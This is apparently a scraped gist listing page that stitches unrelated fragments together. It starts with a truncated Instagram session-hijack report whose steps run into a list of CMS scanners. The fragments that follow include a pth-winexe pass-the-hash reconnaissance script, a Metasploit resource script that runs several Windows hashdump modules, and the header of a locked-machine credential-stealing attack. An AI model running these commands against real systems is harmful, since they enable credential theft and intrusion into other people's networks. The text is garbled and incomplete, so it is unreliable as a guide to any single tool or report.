#Sections
Instagram makes API calls to non-HTTPS endpoints with session cookies in the request headers allowing full session hijack by a malicious actor.
Steps to reproduce (on Mac OS X):
- Jump on an open or WEP encrypted wifi access point
- Put your network interface into promiscuous mode filtering on i.instagram.com
- CMSmap – Content Management System Security Scanner.
- Droopescan – Plugin Based CMS Security Scanner.
- WPScan – WordPress Security/Vulnerability Scanner.
- Plecost – WordPress Fingerprinting Tool.
- WhatWeb – Identify CMS, Blogging Platform, Stats Packages & More.
- BlindElephant – Web Application Fingerprinter.
- wig – WebApp Information Gatherer – Identify CMS.
- Web-Sorrow – Version Detection, CMS Identification, Enumeration & Server Scanning Tool.
- Wappalyzer – Web Technology Identifier (Identify CMS, JavaScript etc.) - firefox addon.
- GoLISMERO – Web Application Mapping Tool.
Linux installation notes (tested under Ubuntu 14.04LTS/12.04LTS), assuming VirtualBox is already installed on host.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
"""Fetching the latest GMail email using OAuth 2 and IMAP. | |
Requires requests-oauthlib, which is available on pypi. | |
Includes a basic SASL XOAUTH2 authentication method for imaplib. | |
""" | |
# Credentials you get from registering a new web application in Google API Console | |
client_id = 'your-id.apps.googleusercontent.com' | |
client_secret = 'your secret' | |
redirect_uri = 'your callback uri' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
TARGET=$1 | |
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "systeminfo" | |
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "whoami /all" | |
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "ipconfig /all" | |
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netstat -ano" | |
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net accounts" | |
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs" | |
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net share" | |
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net view" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
setg SESSION 1 | |
use post/windows/gather/smart_hashdump | |
run | |
use post/windows/gather/credentials/domain_hashdump | |
run | |
use post/windows/gather/credentials/mcafee_vse_hashdump | |
run | |
use post/windows/gather/credentials/mssql_local_hashdump | |
run | |
use post/windows/gather/hashdump |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* @fileoverview This file loads a bunch of HSTS domains and times how long it | |
* takes for them to be redirected from HTTP to HTTPS. Based on that, it | |
* decides whether the domain is a previously-noted HSTS domain or not. | |
* @author yan <[email protected]> | |
* @license MIT | |
* @version 0.2.0 | |
*/ | |
// Timing in milliseconds above which a network request probably occurred. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# | |
# Attack created by Mubix. For more information see: | |
# https://room362.com/post/2016/snagging-creds-from-locked-machines | |
# Modified for Nethunter by Binkybear | |
# | |
# ================== # | |
# Check for root | |
# ================== # |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
urlencode() { | |
# urlencode <string> | |
old_lc_collate=$LC_COLLATE | |
LC_COLLATE=C | |
local length="${#1}" | |
for (( i = 0; i < length; i++ )); do | |
local c="${1:i:1}" | |
case $c in | |
[a-zA-Z0-9.~_-]) printf "$c" ;; |
OlderNewer